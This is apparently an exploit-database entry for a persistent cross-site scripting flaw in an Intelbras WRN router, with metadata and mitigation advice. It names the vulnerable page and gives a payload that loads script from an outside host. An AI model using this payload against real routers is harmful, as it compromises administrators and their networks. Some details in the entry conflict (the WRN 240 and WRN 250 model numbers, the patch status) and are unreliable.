vendor:
Intelbras Wireless N 150Mbps
by:
Elber Tavares
6.1
CVSS
MEDIUM
XSS
79
CWE
Product Name: Intelbras Wireless N 150Mbps
Affected Version From: Intelbras Wireless N 150Mbps - WRN 240
Affected Version To: Not specified
Patch Exists: NO
Related CWE: CVE-2017-14219
CPE: h:intelbras:intelbras_wireless_n_150mbps:wrn_240
Platforms Tested: Kali Linux, Windows 7, 8.1, 10
2017
XSS persistent on intelbras router with firmware WRN 250
This exploit allows for persistent XSS on intelbras routers with firmware WRN 250. The vulnerability can be exploited by injecting a malicious script through the URL http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm. The payload used in the exploit is </script><script src='//elb.me'>. This exploit requires the presence of a PHP script to retrieve the logs.
Mitigation:
To mitigate this vulnerability, it is recommended to update the firmware of the Intelbras router to a version that includes a fix for this issue. Additionally, network administrators can implement input validation and output encoding to prevent XSS attacks.